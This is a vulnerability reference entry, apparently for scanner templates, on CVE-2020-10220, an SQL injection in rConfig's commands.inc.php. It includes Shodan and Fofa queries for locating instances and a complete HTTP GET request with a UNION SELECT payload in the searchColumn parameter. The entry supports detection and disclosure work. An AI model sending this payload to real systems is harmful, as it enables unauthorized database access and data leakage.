| Title | rConfig 3.9 - SQL Injection |
|---|---|
| Author | ritikchaddha,theamanrawat |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. |
| Remediation | Upgrade to a patched version of rConfig or apply the vendor-supplied patch to mitigate this vulnerability. |
| CVSS Score | 9.8 |
| EPSS Score | 0.94024 |
| CVE ID | CVE-2020-10220 |
| CWE ID | CWE-89 |
| Shodan Query | title:"rConfig"http.title:"rconfig" |
| Fofa Query | title="rconfig" |
| Tags | cve cve2020 packetstorm rconfig sqli vuln |
An issue was discovered in rConfig through 3.9.4. The web interface is prone to a SQL injection via the commands.inc.php searchColumn parameter.
GET /commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5('1139'),0x5B50574E5D3C42523E)%20limit%200,1),NULL-- HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.6.2
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-10220.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-10220.pcap
N/AN/A